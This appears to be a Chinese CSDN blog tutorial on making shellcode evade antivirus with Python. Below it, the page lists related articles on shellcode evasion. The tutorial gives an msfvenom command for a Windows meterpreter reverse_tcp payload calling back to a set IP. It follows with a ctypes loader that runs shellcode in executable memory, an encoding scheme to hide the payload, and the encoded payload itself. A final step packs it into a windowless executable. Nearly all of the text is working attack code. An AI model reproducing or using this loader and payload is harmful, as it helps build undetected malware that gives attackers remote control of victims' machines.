python免杀shellcode案例

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量289 收藏 2
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/130046115
版权

简单的病毒绕过免杀,完成加壳操作

  • kali构造payload 
    msfvenom –platform windows –a x64  -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py

  • 放置python执行,注意这是64位系统 
    buf = b"\x4d\x5a\x41\x52\x55\......."

import ctypes
shellcode = buf
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  #注释该句则为32位
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 连接成功

 

  • 进行加密 
    import binascii,base64
resv = binascii.b2a_hex(buf)  #将十六进制转换为字符
src = resv.decode()
# print(res)
def encode(src):
    re = ''
    for r in src:
        new = chr(ord(r)+5) #位移5位
        re += new
    res = base64.b64encode(re.encode()).decode()  #进行base64加密
    print(res)

encode(src)

  • 进行解密并运行 
    import ctypes,binascii,base64

src = "a2g5PT04ajlrNWo9aGg1NTU1NTU5Njo2OTY6NTo3OT04Nmk3OjY7Ojk9PWc6Nzs1OT09Zzo3Nj06Ozk9PWc6Nzc1OWk4Nmg+OT09Zzw3OjU5PTVrZzw5ZjlmOT04Nmg1Zmg4aDs2PGg1NzdoNzU5Nmg2aD41aTk2NTZoNmo3amk6Nzk2OjY5PT1nOjc3NT1nOTc4aDk9NTZpNTs7PTY8PTY9NWc1NzVrPTo8NzU1NTU1NT1nPTU9PTU1NTU1NTk9PTpoNTw5Ozw5PTU2aTU9Zzk9Nj06NTk5PWc5NTc1OT41Nmk1ajg6Ozk9a2toPjlpODZoPjk2PWc4OT09OT01Nmk7OT04Nmg1OTZoNmg+NWlmaDk2NTZoNjg9ajU8Oms2OWg1ODloNzk1PTk6OD5pNjw6aT06PTk5PWc5NTc5OT41Nmk1Ozs5Nj1nNWg5PTk5PWc5NTZoOT41Nmk1OTY9ZzU5PT05Njo9OT01Nmk1OTY6PTpqOj46Zjk2Oj05Njo+OTY6Zjk9PThqaDc1OTY6N2trajU6PTk2Oj46Zjk9PWc2N2o+OWdra2tra2s6aTk+Z2o8PDw4ODc6azg4ODc1NTU1OTY6Ozk+PT5qOzk9PTZqaGY1NTY1NTU1OT49Pmo6OT5naDU3NTU2NjpoaDVmPTY3Zz05Njo5OT49Pmo5OWg9Pms2OTZnZjloPDw3OzU8a2tpOjloPT5qZjs9NTY1NjU1NTU6Pjk2Z2Y3Pj01O2c1NWtraTo7ZjVmOTY6ajo1OjU5aTg2aD45aTg2aDU5PWtraDU5PT0+aDc5PWtraDU5PT0+aDY5NmdmamY1a2lrajVra2k6OT09Pmg8O2Y2NTk2Oj05aD0+ajc5PT0+az45NmdmPj5mOjw5OzZra2k6PTpoNTw5NWY5PmtraGo8Omo6aj0+ODU1NTU1NTk9PThqaDY1OT09Pmo3OWk4Nmg+O2Y1OTk2Oj05PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGo6Ojk9PThoOTc1Omo9Pms7O2Y5NTk2Oj47PTU1NjU1NTU1OTY6PTk9PT5rNzk9ODZoPjk2Z2Y6PWY5OjhqOmtraTo5PT0+aDg5Pj0+aDw5aTg2aD45Pj0+azU5PT0+aWY5PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGk3PTo9OTY6PDo+Oz01NTk1NTU1NTk2Oj07ZjU1OmY5NmdmNWc3azVrODVra2k6Ojw6Pjk2Z2Y8OjtqOWk7NmtraTo5PmtraGpqPjhoa2tra2trOT01Nmg4OT03Pmg7OT09Oms7PDpnOTk2a2tqPDo9O2Y1NTo+OT5oPGg3azVnOmY3Ojtra2k6"
def decode(src):
    res = base64.b64decode(src).decode()
    # print(res)
    sr = ''
    for s in res:
        new = chr(ord(s) - 5)
        sr += new
    # print(sr)
    buf = binascii.a2b_hex(sr)   #将字符转换为十六进制
    return buf

buf = decode(src)

# print(buf)

shellcode = buf
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 使用python命令打包 
    pyinstaller -F -w payload.py

     

     

gg_Go_game
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
读书笔记之python渗透测试.docx
04-13
以上知识点涵盖了渗透测试中的多个方面,包括但不限于黑盒测试、白盒测试、WAF绕过、基于Python的测试工具使用以及免杀技术等。这些内容不仅适用于学习和掌握渗透测试技能,也为实际工作中遇到的相关问题提供了参考...
【红蓝对抗】Python免杀入门学习
Fighter安全
04-23 1832
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
python加载shellcode免杀 简介
whatday的专栏
10-02 4611
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 919
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
python免杀基础——三步(查杀、连接、代码)情况
渗透测试
11-14 1865
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接和上次一样,秒连。
Python常见的免杀方式
m0_62207482的博客
02-09 1228
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
免杀学习(二)python
m0_62207170的博客
01-09 573
python免杀
GiTS-2015-Pirate-s-Treasure-solution:Shellcode 2015 中的幽灵
06-29
总的来说,"GiTS-2015-Pirate-s-Treasure-solution"挑战是一个结合了Python编程、逆向工程和安全漏洞利用的实战案例。通过研究这个挑战的解决方案,我们可以学习到如何在实际环境中应用Python进行安全分析,提高自身...
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1 绕过火绒安全提权实战案例1是指在 ...首先,需要执行以下命令生成 shellcode,然后在 VPS 上使用 Python 开启一个临时 Web 用于远程调用,并在 ASPX 大框的执行命令功能处使用系统命令。
Um-Livrinho-Sobre-Exploit-Dev
04-11
10. **实际案例分析**:通过实际的漏洞利用案例,帮助读者巩固理论知识,提升实战能力。 书中的"Um-Livrinho-Sobre-Exploit-Dev-main"可能包含该书的源码、示例代码或相关资源,供读者下载后使用mdbook serve工具...
RFC_LINUX手册.7z
10-30
7. **pwn学习历程.pdf**:这可能是个人或团队分享pwn学习经验的文档,包括技巧、案例分析和学习路径,对初学者来说是很好的参考资料。 综合以上,这个压缩包提供的学习资源涵盖了网络协议(尤其是YANG和Netconf)、...
Python免杀技术详解
weixin_68789096的博客
11-02 1483
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
小王问我python怎么免杀,我沉默了......
Liyu_6618的博客
02-01 494
Python免杀Shellcode思路
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1270
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 4974
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
python免杀学习
m0_58595840的博客
01-06 447
python免杀bypass学习
Shellcode免杀对抗(Python)
热门推荐
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
免杀】分离免杀python
zhangshuaiijie的博客
06-28 696
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
Python shellcode免杀
qq_25761407的博客
04-02 5523
Python shellcode免杀
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码难以被静态分析,动态生成则可以避免被动态检测。此外,还可以使用反射注入等技术来绕过杀毒软件的检测。总之,Python shellcode免杀技术是一种比较高级的安全技术,需要有一定的编程和安全知识才能实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值